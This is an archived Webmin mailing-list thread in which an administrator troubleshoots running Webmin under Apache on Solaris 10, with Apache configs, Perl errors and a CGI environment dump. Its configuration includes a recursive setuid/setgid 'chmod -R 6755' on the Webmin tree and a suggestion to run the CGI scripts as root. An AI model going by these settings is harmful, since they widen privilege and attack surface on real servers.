> WEBMIN_CONFIG=/etc/webmin
> WEBMIN_VAR=/var/webmin
> 
> ============================================================================================
> 
> Based upon all of the above, this all but has to be a permissions issue
> 
> Thanks again and have a great weekend!
> 
> Michael Peoples
> Senior Systems Manager
> AT&T - ATTSI
> Office:            614-789-8559
> Cell:    614-886-0923
> FAX:   614-789-8975
> mpe...@at...
> 
> This e-mail and any files transmitted with it are AT&T property, are confidential,
> and are intended solely for the use of the individual or entity to whom this email
> is addressed. If you are not one of the named recipient(s) or otherwise have reason
> to believe that you have received this message in error, please notify the sender
> and delete this message immediately from your computer. Any other use, retention,
> dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
> 
> 
> -----Original Message-----
> From: Jamie Cameron [mailto:jca...@we...] 
> Sent: Friday, March 18, 2011 5:00 PM
> To: Webmin development list
> Subject: Re: [webmin-devel]CORRECTION - PROBLEM NOT SOLVED RE:StumblingForward
> RE: Getting Webmin to rununderApacheforSolaris10-- Creating dent in desk from banging
> head.
> 
> One thing to check is if CGI scripts are being executed by Apache properly
> and with the correct permissions. Try putting a file named test.cgi in the 
> Webmin root directory (/opt/webmin) , and then accessing it in your browser.
> The script should contain :
> 
> #!/bin/sh
> echo Content-type: text/plain
> echo ""
> id -a
> env
> 
> And then post the output here.
> 
>  - Jamie
> 
> On 17/Mar/2011 17:30 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > No luck with just the PERLLIB setting.  PERL5LIB is set in the default environment,
> > so it is most likely still "active".  Would that make a difference? I suppose
> it
> > probably would if webmin can't find the proper Perl.
> > 
> > It tried the following in both files to "suppress" the PERL5LIB value:
> > 
> > SetEnv PER5LIB ""
> > 
> > But it still failed.
> > 
> > Does anyone need to see something in particular to help me here?  I'll provide
> > what I can.
> > 
> > Michael Peoples
> > Senior Systems Manager
> > AT&T - ATTSI
> > Office:            614-789-8559
> > Cell:    614-886-0923
> > FAX:   614-789-8975
> > mpe...@at...
> > 
> > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > and are intended solely for the use of the individual or entity to whom this
> email
> > is addressed. If you are not one of the named recipient(s) or otherwise have
> reason
> > to believe that you have received this message in error, please notify the sender
> > and delete this message immediately from your computer. Any other use, retention,
> > dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
> > 
> > 
> > -----Original Message-----
> > From: Jamie Cameron [mailto:jca...@we...] 
> > Sent: Thursday, March 17, 2011 2:22 PM
> > To: Webmin development list
> > Subject: Re: [webmin-devel]CORRECTION - PROBLEM NOT SOLVED RE: StumblingForward
> > RE: Getting Webmin to rununderApache forSolaris10-- Creating dent in desk from
> > banging head.
> > 
> > Are you sure you want to set PERL5LIB as well? That might be overriding PERLLIB
> > , which
> > is set correctly.
> > 
> > On 17/Mar/2011 06:31 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > > I jumped the gun on this one.  My browser auto-filled another server with a
> similar
> > > name, and I failed to notice.  
> > > 
> > > The original problem still exists, with the same error messages as before.
> > > 
> > > I placed the following lines in both the main httpd.conf file and the virtual
> > server
> > > definition file.
> > > 
> > > SetEnv PERL5LIB "/usr/local/lib/perl5"
> > > SetEnv PERLLIB "/opt/webmin"
> > > 
> > > What else might I try?
> > > 
> > > Michael Peoples
> > > Senior Systems Manager
> > > AT&T - ATTSI
> > > Office:            614-789-8559
> > > Cell:    614-886-0923
> > > FAX:   614-789-8975
> > > mpe...@at...
> > > 
> > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > and are intended solely for the use of the individual or entity to whom this
> > email
> > > is addressed. If you are not one of the named recipient(s) or otherwise have
> > reason
> > > to believe that you have received this message in error, please notify the
> sender
> > > and delete this message immediately from your computer. Any other use, retention,
> > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> prohibited."
> > > 
> > > 
> > > -----Original Message-----
> > > From: PEOPLES, MICHAEL P (ATTSI) 
> > > Sent: Thursday, March 17, 2011 9:10 AM
> > > To: Webmin development list
> > > Subject: Re: [webmin-devel] Stumbling Forward RE: Getting Webmin to rununderApache
> > > for Solaris10-- Creating dent in desk from banging head.
> > > 
> > > That did the trick.  You might wish to consider putting that in the documentation
> > > also.
> > > 
> > > Thanks.
> > > 
> > > Michael Peoples
> > > Senior Systems Manager
> > > AT&T - ATTSI
> > > Office:            614-789-8559
> > > Cell:    614-886-0923
> > > FAX:   614-789-8975
> > > mpe...@at...
> > > 
> > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > and are intended solely for the use of the individual or entity to whom this
> > email
> > > is addressed. If you are not one of the named recipient(s) or otherwise have
> > reason
> > > to believe that you have received this message in error, please notify the
> sender
> > > and delete this message immediately from your computer. Any other use, retention,
> > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> prohibited."
> > > 
> > > -----Original Message-----
> > > From: Jamie Cameron [mailto:jca...@we...] 
> > > Sent: Wednesday, March 16, 2011 7:53 PM
> > > To: Webmin development list
> > > Subject: Re: [webmin-devel]Stumbling Forward RE: Getting Webmin to run underApache
> > > for Solaris10-- Creating dent in desk from banging head.
> > > 
> > > Sounds like maybe the PERLLIB environment variable isn't set to the webmin
> > > root directory (typically /usr/libexec/webmin or /usr/share/webmin). You will
> > > need to set that in your apache config, like WEBMIN_CONFIG is defined.
> > > 
> > > On 16/Mar/2011 13:57 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > > > I have the Apache server responding on port 10000.  It even threw up a "Windows"
> > > > login dialog box (versus the standard Webmin login page).But now it's throwing
> > > > internal server (apache) errors:
> > > > 
> > > > Undefined subroutine &WebminCore::init_config called at /dev/fs/4 line 7.
> > > > Premature end of script headers: index.cgi
> > > > 
> > > > I can infer that Perl didn't effectively process the "use WebminCore;" line
> > properly,
> > > > but that may not be the issue.  This message seems very familiar to me for
> > some
> > > > reason.
> > > > 
> > > > Running index.cgi at the command line produces the following error:
> > > > 
> > > > # perl -w ./index.cgi
> > > > Name "WebminCore::STEST" used only once: possible typo at web-lib-funcs.pl
> > line
> > > > 1898.
> > > > Name "main::remote_user" used only once: possible typo at ./index.cgi line
> > 73.
> > > > WEBMIN_CONFIG not set at web-lib-funcs.pl line 3943.
> > > > Use of uninitialized value $callpkg in concatenation (.) or string at web-lib-funcs.pl
> > > > line 9231.
> > > > Use of uninitialized value $initial_module_name in string eq at web-lib-funcs.pl
> > > > line 8200.
> > > > Use of uninitialized value in string eq at web-lib-funcs.pl line 8200.
> > > > 
> > > > I would sort of expect that given that key environment variables are not
> set.
> > > > 
> > > > In both the httpd.conf file and the separate included file containing the
> Webmin
> > > > virtual server configuration, I have the four SetEnv statements.
> > > > 
> > > > I'm running Perl 5.12.0 and Webmin 1.530
> > > > 
> > > > Any thoughts?
> > > > 
> > > > Michael Peoples
> > > > Senior Systems Manager
> > > > AT&T - ATTSI
> > > > Office:            614-789-8559
> > > > Cell:    614-886-0923
> > > > FAX:   614-789-8975
> > > > mpe...@at...
> > > > 
> > > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > > and are intended solely for the use of the individual or entity to whom this
> > > email
> > > > is addressed. If you are not one of the named recipient(s) or otherwise have
> > > reason
> > > > to believe that you have received this message in error, please notify the
> > sender
> > > > and delete this message immediately from your computer. Any other use, retention,
> > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > prohibited."
> > > > 
> > > > 
> > > > -----Original Message-----
> > > > From: Jamie Cameron [mailto:jca...@we...] 
> > > > Sent: Monday, March 14, 2011 8:15 PM
> > > > To: Webmin development list
> > > > Subject: Re: [webmin-devel]Getting Webmin to run under Apache for Solaris10--
> > > Creating
> > > > dent in desk from banging head.
> > > > 
> > > > On 14/Mar/2011 16:57 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > > > > Jamie,
> > > > > 
> > > > > As always, I very much appreciate your prompt responses and help, as I
> know
> > > you
> > > > > have another life creating other great software.
> > > > > 
> > > > > If I missed, in the documentation, the need to put that directive in the
> > main
> > > > (global)
> > > > > Apache configuration, I apologize.  I really do RTFM before I bother busy
> > people.
> > > > > If I didn't miss it, perhaps if should be added.  I would be happy to make
> > > updates
> > > > > to the documents, particularly in areas where I was confused, but I have
> > no
> > > access.
> > > > 
> > > > Hi Michael,
> > > > 
> > > > The docs didn't mention that as most users who run webmin under apache do
> it
> > > because
> > > > they want or need to use port 80, which apache is already listening on. I
> will
> > > > update
> > > > the docs to mention this.
> > > > 
> > > > > Your question is a good one.  I was going to try it merely to see if there
> > > was
> > > > > an appreciable difference in performance.  What I can tell you within the
> > bounds
> > > > > of proprietary information is, and you may have guessed some of this from
> > previous
> > > > > questions, I (we) are using Webmin on a single server in an attempt to
> provide
> > > > > a front end for Enterprise management.  
> > > > > 
> > > > > We have come a long way and my feeling now is that it was the right decision.
> > > > > I believe we can leverage existing Webmin code and modules in an "abstracted"
> > > > manner
> > > > > where the interface is centrally located on an extremely secure server
> with
> > > secure
> > > > > access to large numbers of servers.  
> > > > > 
> > > > > So, I'm not suggesting there were any problems with miniserv.pl.  In fact,
> > > there's
> > > > > no inherent reason I couldn't use it to throw up any "web" language  I
> choose.
> > > > > 
> > > > > Sorry about being a bit fuzzy on the details, but I assure you that I will
> > > make
> > > > > every effort to publish what I can and still keep my job (the mortgage
> company
> > > > > is very fond of that monthly payment).
> > > > > 
> > > > > I'll put that directive in and run some comparative tests.
> > > > 
> > > > Ok, let us know how the performance tests work out ...
> > > > 
> > > >  - Jamie
> > > > 
> > > > > Again, thanks for all of the work you've done to help the larger IT community.
> > > > > 
> > > > > Michael Peoples
> > > > > Senior Systems Manager
> > > > > AT&T - ATTSI
> > > > > Office:            614-789-8559
> > > > > Cell:    614-886-0923
> > > > > FAX:   614-789-8975
> > > > > mpe...@at...
> > > > > 
> > > > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > > > and are intended solely for the use of the individual or entity to whom
> this
> > > > email
> > > > > is addressed. If you are not one of the named recipient(s) or otherwise
> have
> > > > reason
> > > > > to believe that you have received this message in error, please notify
> the
> > > sender
> > > > > and delete this message immediately from your computer. Any other use,
> retention,
> > > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > > prohibited."
> > > > > 
> > > > > 
> > > > > -----Original Message-----
> > > > > From: Jamie Cameron [mailto:jca...@we...] 
> > > > > Sent: Monday, March 14, 2011 4:52 PM
> > > > > To: Webmin development list
> > > > > Subject: Re: [webmin-devel]Getting Webmin to run under Apache for Solaris10
> > > --
> > > > > Creating dent in desk from banging head.
> > > > > 
> > > > > Hi Michael,
> > > > > 
> > > > > Did you add the line :
> > > > > 
> > > > > Listen 10000
> > > > > 
> > > > > to your Apache config? Without this, Apache won't even accept connections
> > on
> > > > > port 10000.
> > > > > 
> > > > > Regarding the speed of Apache vs miniserv, even though Apache is far better
> > > webserver
> > > > > in general and written in a faster language (C), miniserv may actually
> be
> > more
> > > > > efficient
> > > > > for running Webmin as it can execute the perl CGI scripts within the same
> > process,
> > > > > without needing to launch a perl interpreter for each request as Apache
> would.
> > > > > 
> > > > > Could you tell us more about the kind of app you are running, and the performance
> > > > > issues you are seeing with regular Webmin?
> > > > > 
> > > > >  - Jamie
> > > > > 
> > > > > On 14/Mar/2011 12:38 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote
> ..
> > > > > > Reports are, there are advantages (speed at least) to running it under
> > Apache.
> > > > > > 
> > > > > > I hope I'm not telling you something you already know, I apologize if
> I
> > am,
> > > > but
> > > > > > the miniserv.pl (the Webmin web server) is essentially a looping Perl
> script.
> > > > > > Rather clever in my opinion and certainly much lighter than a full Apache
> > > implementation.
> > > > > > 
> > > > > > In our particular case, we're doing some unusual things with Webmin,
> so
> > I'm
> > > > trying
> > > > > > to squeeze every ounce of performance out of it.
> > > > > > 
> > > > > > Michael Peoples
> > > > > > Senior Systems Manager
> > > > > > AT&T - ATTSI
> > > > > > Office:            614-789-8559
> > > > > > Cell:    614-886-0923
> > > > > > FAX:   614-789-8975
> > > > > > mpe...@at...
> > > > > > 
> > > > > > This e-mail and any files transmitted with it are AT&T property, are
> confidential,
> > > > > > and are intended solely for the use of the individual or entity to whom
> > this
> > > > > email
> > > > > > is addressed. If you are not one of the named recipient(s) or otherwise
> > have
> > > > > reason
> > > > > > to believe that you have received this message in error, please notify
> > the
> > > > sender
> > > > > > and delete this message immediately from your computer. Any other use,
> > retention,
> > > > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > > > prohibited."
> > > > > > 
> > > > > > -----Original Message-----
> > > > > > From: Ron Wheeler [mailto:rwh...@ar...] 
> > > > > > Sent: Monday, March 14, 2011 2:33 PM
> > > > > > To: web...@li...
> > > > > > Subject: Re: [webmin-devel] Getting Webmin to run under Apache for Solaris
> > > > 10
> > > > > --
> > > > > > Creating dent in desk from banging head.
> > > > > > 
> > > > > > Why not just run it the way it is supposed to run on port 10000?
> > > > > > 
> > > > > > Ron
> > > > > > 
> > > > > > On 14/03/2011 2:25 PM, PEOPLES, MICHAEL P (ATTSI) wrote:
> > > > > > > I have spent days trying to get Webmin to run under Apache, but to
> no
> > > > > > > avail.  Despite attempting to follow both follow the instructions to
> > the
> > > > > > > letter, as well as interpret them as best I could, it doesn't work.
> > I'm
> > > > > > > sure it works, because Jamie says it does, and Jamie knows what he's
> > > > > > > talking about.  The problem is me.
> > > > > > >
> > > > > > > I am trying to run it as a virtual server on a Solaris 10 box running
> > > > > > > Apache 2.2.16.  I did the following:
> > > > > > >
> > > > > > > Created a virtual server
> > > > > > >
> > > > > > > <VirtualHost _default_:10000>
> > > > > > >
> > > > > > >      ServerName myserver.att.com:10000
> > > > > > >
> > > > > > >      DocumentRoot /opt/webmin
> > > > > > >
> > > > > > >      ServerAdmin mp...@at...
> > > > > > >
> > > > > > >      ErrorLog "/usr/apache2_2_16/logs/error_log"
> > > > > > >
> > > > > > >      TransferLog "/usr/apache2_2_16/logs/access_log"
> > > > > > >
> > > > > > >      ScriptAlias /cgi-bin/ "/usr/apache2_2_16/cgi-bin/"
> > > > > > >
> > > > > > >      ScriptAlias /script-cgi-bin/ "/usr/apache2_2_16/htdocs/scripts/"
> > > > > > >
> > > > > > >      SSLEngine on
> > > > > > >      SSLCertificateFile "/usr/apache2_2_16/conf/myserver.crt"
> > > > > > >      SSLCertificateKeyFile "/usr/apache2_2_16/conf/myserver.key"
> > > > > > >      SSLCACertificateFile "/usr/apache2_2_16/conf/myserver.CA.root.crt"
> > > > > > >      SSLCACertificateFile
> > > > > > > "/usr/apache2_2_16/conf/myserver.intermediate.crt"
> > > > > > >
> > > > > > >      <FilesMatch "\.(cgi|shtml|phtml|php)$">
> > > > > > >          SSLOptions +StdEnvVars
> > > > > > >      </FilesMatch>
> > > > > > >
> > > > > > >      <Directory "/usr/apache2_2_16/cgi-bin">
> > > > > > >          SSLOptions +StdEnvVars
> > > > > > >      </Directory>
> > > > > > >
> > > > > > >      BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown
> > > > > > > downgrade-1.0 force-response-1.0
> > > > > > >
> > > > > > >      CustomLog "/usr/apache2_2_16/logs/ssl_request_log"           "%t
> > %h
> > > > > > > %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > > > > > >
> > > > > > >      <Directory "/opt/webmin">
> > > > > > >          allow from all
> > > > > > >          Options +Indexes
> > > > > > >          AuthName Webmin
> > > > > > >          AuthType basic
> > > > > > >          AuthUserFile /etc/webmin/htusers
> > > > > > >          require valid-user
> > > > > > >      </Directory>
> > > > > > >
> > > > > > > </VirtualHost>
> > > > > > >
> > > > > > > Added AddHandler directive to MAIN Apache configuration section
> > > > > > >
> > > > > > > AddHandler cgi-script .cgi
> > > > > > >
> > > > > > > Added index.cgi directive to MAIN Apache configuration section
> > > > > > >
> > > > > > > DirectoryIndex index.html index.cgi
> > > > > > >
> > > > > > > Added the following directives to MAIN Apache configuration section
> > > > > > >
> > > > > > > 		SetEnv WEBMIN_CONFIG /etc/webmin
> > > > > > > 		SetEnv WEBMIN_VAR /var/webmin
> > > > > > > 		SetEnv SERVER_ROOT /opt/webmin
> > > > > > > 		SetEnv MINISERV_CONFIG /etc/webmin/miniserv.conf
> > > > > > >
> > > > > > > Added the following directives to MAIN Apache configuration section
> > > > > > >
> > > > > > >      <Directory "/opt/webmin">
> > > > > > >          allow from all
> > > > > > >          Options +Indexes
> > > > > > >          AuthName Webmin
> > > > > > >          AuthType basic
> > > > > > >          AuthUserFile /etc/webmin/htusers
> > > > > > >          require valid-user
> > > > > > >      </Directory>
> > > > > > >
> > > > > > >
> > > > > > > /etc/webmin/htusers file setup
> > > > > > >
> > > > > > > Again, it's not clear what is being requested here.  I created a file
> > > > > > > with each of the users in it, one to a line, like the following:
> > > > > > >
> > > > > > > 		root
> > > > > > > 		user1
> > > > > > > 		user2
> > > > > > >
> > > > > > > I also tried using htpasswd to create a file called /etc/webmin/htusers,
> > > > > > > but that also did not change things.
> > > > > > >
> > > > > > > To be frank, I'm not sure what should be in this file.  Explicit
> > > > > > > examples would be helpful.
> > > > > > >
> > > > > > > Ran the ownership and permission attribute change commands
> > > > > > >
> > > > > > > 		chown -R root:root /opt/webmin
> > > > > > > 		chmod -R 6755 /opt/webmin
> > > > > > >
> > > > > > > > From directory /opt/webmin, ran the following command
> > > > > > >
> > > > > > > find . -name "*.cgi" -o -name "*.pl" | perl perlpath.pl "/usr/bin/perl
> > > > > > > -U" -
> > > > > > >
> > > > > > > Configure Webmin to use the 'Default Webmin Theme'
> > > > > > >
> > > > > > > There's nothing I could do here.  The only theme I have is the "blue"
> > > > > > > theme.  There is nothing in the Webmin Solaris package that might be
> > > > > > > considered a "default theme".
> > > > > > >
> > > > > > > I also tried it putting all (or most) of the above within the virtual
> > > > > > > host definition:
> > > > > > >
> > > > > > > <VirtualHost _default_:10000>
> > > > > > >
> > > > > > >      ServerName myserver.att.com:10000
> > > > > > >
> > > > > > >      DocumentRoot /opt/webmin
> > > > > > >
> > > > > > >      ServerAdmin mp...@at...
> > > > > > >
> > > > > > >      ErrorLog "/usr/apache2_2_16/logs/error_log"
> > > > > > >
> > > > > > >      TransferLog "/usr/apache2_2_16/logs/access_log"
> > > > > > >
> > > > > > >      ScriptAlias /cgi-bin/ "/usr/apache2_2_16/cgi-bin/"
> > > > > > >
> > > > > > >      ScriptAlias /script-cgi-bin/ "/usr/apache2_2_16/htdocs/scripts/"
> > > > > > >
> > > > > > >      SSLEngine on
> > > > > > >      SSLCertificateFile "/usr/apache2_2_16/conf/myserver.crt"
> > > > > > >      SSLCertificateKeyFile "/usr/apache2_2_16/conf/myserver.key"
> > > > > > >      SSLCACertificateFile "/usr/apache2_2_16/conf/myserver.CA.root.crt"
> > > > > > >      SSLCACertificateFile
> > > > > > > "/usr/apache2_2_16/conf/myserver.intermediate.crt"
> > > > > > >
> > > > > > >      AddHandler cgi-script .cgi
> > > > > > >
> > > > > > >      <FilesMatch "\.(cgi|shtml|phtml|php)$">
> > > > > > >          SSLOptions +StdEnvVars
> > > > > > >      </FilesMatch>
> > > > > > >
> > > > > > >      <Directory "/usr/apache2_2_16/cgi-bin">
> > > > > > >          SSLOptions +StdEnvVars
> > > > > > >      </Directory>
> > > > > > >
> > > > > > >      BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown
> > > > > > > downgrade-1.0 force-response-1.0
> > > > > > >
> > > > > > >      CustomLog "/usr/apache2_2_16/logs/ssl_request_log"           "%t
> > %h
> > > > > > > %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > > > > > >
> > > > > > >      <Directory "/opt/webmin">
> > > > > > >          allow from all
> > > > > > >          Options +Indexes
> > > > > > >          AuthName Webmin
> > > > > > >          AuthType basic
> > > > > > >          AuthUserFile /etc/webmin/htusers
> > > > > > >          require valid-user
> > > > > > >      </Directory>
> > > > > > >
> > > > > > >      SetEnv WEBMIN_CONFIG "/etc/webmin"
> > > > > > >      SetEnv WEBMIN_VAR "/var/webmin"
> > > > > > >      SetEnv SERVER_ROOT "/opt/webmin"
> > > > > > >      SetEnv MINISERV_CONFIG "/etc/webmin/miniserv.conf"
> > > > > > > </VirtualHost>
> > > > > > >
> > > > > > > I restarted Apache after each change, but never got the Webmin site
> or
> > > > > > > any error messages even referring to it.  Nothing was listening on
> port
> > > > > > > 10000.
> > > > > > >
> > > > > > > I also tried the "Apache In A Sub-Directory" method, but it didn't
> work.
> > > > > > >
> > > > > > > If I fire up Webmin as I normally would, it works.  I just can't get
> > it
> > > > > > > to work under Apache.
> > > > > > >
> > > > > > > Sorry for the long e-mail, but thanks for any help anyone can offer.
> > > > > > >
> > > > > > > Michael Peoples
> > > > > > > Senior Systems Manager
> > > > > > > AT&T - ATTSI
> > > > > > > Office:            614-789-8559
> > > > > > > Cell:    614-886-0923
> > > > > > > FAX:   614-789-8975
> > > > > > > mpe...@at...
> > > > > > >
> > > > > > > This e-mail and any files transmitted with it are AT&T property, are
> > > > > > > confidential, and are intended solely for the use of the individual
> or
> > > > > > > entity to whom this email is addressed. If you are not one of the named
> > > > > > > recipient(s) or otherwise have reason to believe that you have received
> > > > > > > this message in error, please notify the sender and delete this message
> > > > > > > immediately from your computer. Any other use, retention, dissemination,
> > > > > > > forwarding, printing, or copying of this e-mail is strictly prohibited."
> > > > > > >
> > > > > > >
> > > > > > >
> > > > > > > ------------------------------------------------------------------------------
> > > > > > > Colocation vs. Managed Hosting
> > > > > > > A question and answer guide to determining the best fit
> > > > > > > for your organization - today and in the future.
> > > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > > -
> > > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > > To remove yourself from this list, go to
> > > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > > >
> > > > > > 
> > > > > > 
> > > > > > ------------------------------------------------------------------------------
> > > > > > Colocation vs. Managed Hosting
> > > > > > A question and answer guide to determining the best fit
> > > > > > for your organization - today and in the future.
> > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > -
> > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > To remove yourself from this list, go to
> > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > > 
> > > > > > ------------------------------------------------------------------------------
> > > > > > Colocation vs. Managed Hosting
> > > > > > A question and answer guide to determining the best fit
> > > > > > for your organization - today and in the future.
> > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > -
> > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > To remove yourself from this list, go to
> > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > 
> > > > > ------------------------------------------------------------------------------
> > > > > Colocation vs. Managed Hosting
> > > > > A question and answer guide to determining the best fit
> > > > > for your organization - today and in the future.
> > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > -
> > > > > Forwarded by the Webmin development list at web...@we...
> > > > > To remove yourself from this list, go to
> > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > 
> > > > ------------------------------------------------------------------------------
> > > > Colocation vs. Managed Hosting
> > > > A question and answer guide to determining the best fit
> > > > for your organization - today and in the future.
> > > > http://p.sf.net/sfu/internap-sfd2d
> > > > -
> > > > Forwarded by the Webmin development list at web...@we...
> > > > To remove yourself from this list, go to
> > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > 
> > > ------------------------------------------------------------------------------
> > > Colocation vs. Managed Hosting
> > > A question and answer guide to determining the best fit
> > > for your organization - today and in the future.
> > > http://p.sf.net/sfu/internap-sfd2d
> > > -
> > > Forwarded by the Webmin development list at web...@we...
> > > To remove yourself from this list, go to
> > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > 
> > > ------------------------------------------------------------------------------
> > > Colocation vs. Managed Hosting
> > > A question and answer guide to determining the best fit
> > > for your organization - today and in the future.
> > > http://p.sf.net/sfu/internap-sfd2d
> > > -
> > > Forwarded by the Webmin development list at web...@we...
> > > To remove yourself from this list, go to
> > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > 
> > ------------------------------------------------------------------------------
> > Colocation vs. Managed Hosting
> > A question and answer guide to determining the best fit
> > for your organization - today and in the future.
> > http://p.sf.net/sfu/internap-sfd2d
> > -
> > Forwarded by the Webmin development list at web...@we...
> > To remove yourself from this list, go to
> > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> 
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel

Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:StumblingForward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk frombanging head.

[Jamie C. <jca...@we...>]

If you run index.cgi from the command line as root, make sure you run it using
the file path, like /opt/webmin/index.cgi .

If it is run by Apache, it needs to be run as root - or else the scripts won't
have permissions do actually do anything.

 - Jamie

On 18/Mar/2011 15:27 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> (Sorry for the potential duplicate, I flipped the last one to HTML and it got quarantined
> on the mail server).
> 
> Firstly, this feels an awful like when I tried to run modules from the command
> line.  I was on an environment variable and "require" merry-go-round that was frustrating.
> 
> I also want to mention that Apache is running under user 'apache', not 'root',
> if that's relevant.
> 
> ============================================================================================
> 
> I tried executing the index.cgi script as user 'apache' after executing the following:
> 
> PERLLIB="/opt/webmin"; export PERLLIB
> WEBMIN_CONFIG="/etc/webmin" ; export WEBMIN_CONFIG
> WEBMIN_VAR="/var/webmin" ; export WEBMIN_VAR
> SERVER_ROOT="/opt/webmin" ; export SERVER_ROOT
> MINISERV_CONFIG="/etc/webmin/miniserv.conf" ; export MINISERV_CONFIG
> 
> I got the same error: Undefined subroutine &WebminCore::init_config called at /dev/fd/3
> line 7
> 
> ============================================================================================
> 
> I then executed the index.cgi script as user 'root' after executing the following:
> 
> PERLLIB="/opt/webmin"; export PERLLIB
> WEBMIN_CONFIG="/etc/webmin" ; export WEBMIN_CONFIG
> WEBMIN_VAR="/var/webmin" ; export WEBMIN_VAR
> SERVER_ROOT="/opt/webmin" ; export SERVER_ROOT
> MINISERV_CONFIG="/etc/webmin/miniserv.conf" ; export MINISERV_CONFIG
> 
> I got a different error message unrelated to the error above, most likely thrown
> by the web-lib-funcs.pl:
> 
> Error: Script was not run with full path (failed to find ./index.cgi under /opt/webmin)
> JJ
> -----
> Script was not run with full path (failed to find ./index.cgi under /opt/webmin)
> -----
> 
> ============================================================================================
> 
> I shut down miniserv.pl, changed the Apache config, and restarted Apache cleanly.
> Apache was listening on port 10000.
> 
> I pointed my web browser at https://dubsol10.apt.att.com:10000/test.cgi.
> 
> A dialog box popped up asking for my user name and password.  I supplied that an
> the browser displayed the following.  Some data was removed and replaced with a
> <data> placeholder.  If it is relevant to anyone's analysis, I'll try to provide
> it.
> 
> ============================================================================================
> 
> uid=7788(apache) gid=8777(apache) groups=8777(apache),7000(nobody)
> AUTH_TYPE=Basic
> DOCUMENT_ROOT=/opt/webmin
> GATEWAY_INTERFACE=CGI/1.1
> HTTPS=on
> HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
> HTTP_ACCEPT_ENCODING=gzip,deflate
> HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
> HTTP_CONNECTION=keep-alive
> HTTP_COOKIE=<data>
> HTTP_HOST=dubsol10.apt.att.com:10000
> HTTP_KEEP_ALIVE=115
> HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203
> Firefox/3.6.13
> MINISERV_CONFIG=/etc/webmin/miniserv.conf
> PATH=/usr/local/bin:/usr/sbin:/usr/bin:/usr/sfw/bin:/usr/local/sbin:/usr/ccs/bin:
> PERL5LIB=
> PERLLIB=/opt/webmin
> QUERY_STRING=
> REMOTE_ADDR=<data>
> REMOTE_PORT=<data>
> REMOTE_USER=root
> REQUEST_METHOD=GET
> REQUEST_URI=/test.cgi
> SCRIPT_FILENAME=/opt/webmin/test.cgi
> SCRIPT_NAME=/test.cgi
> SERVER_ADDR=<data>
> SERVER_ADMIN=mp...@at...
> SERVER_NAME=dubsol10.apt.att.com
> SERVER_PORT=10000
> SERVER_PROTOCOL=HTTP/1.1
> SERVER_ROOT=/opt/webmin
> SERVER_SIGNATURE=
> SERVER_SOFTWARE=Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7d PHP/5.3.3
> SSL_CIPHER=<data>
> SSL_CIPHER_ALGKEYSIZE=<data>
> SSL_CIPHER_EXPORT=false
> SSL_CIPHER_USEKEYSIZE=<data>
> SSL_CLIENT_VERIFY=<data>
> SSL_COMPRESS_METHOD=<data>
> SSL_PROTOCOL=<data>
> SSL_SECURE_RENEG=<data>
> SSL_SERVER_A_KEY=<data>
> SSL_SERVER_A_SIG=<data>
> SSL_SERVER_I_DN=<data>
> SSL_SERVER_I_DN_C=US
> SSL_SERVER_I_DN_CN=VeriSign Class 3 Secure Server CA - G3
> SSL_SERVER_I_DN_O=VeriSign, Inc.
> SSL_SERVER_I_DN_OU=VeriSign Trust Network
> SSL_SERVER_I_DN_OU_1=Terms of use at https://www.verisign.com/rpa (c)10
> SSL_SERVER_M_SERIAL=<data>
> SSL_SERVER_M_VERSION=3
> SSL_SERVER_S_DN=<data>
> SSL_SERVER_S_DN_C=US
> SSL_SERVER_S_DN_CN=dubsol10.apt.att.com
> SSL_SERVER_S_DN_L=<data>
> SSL_SERVER_S_DN_O=<data>
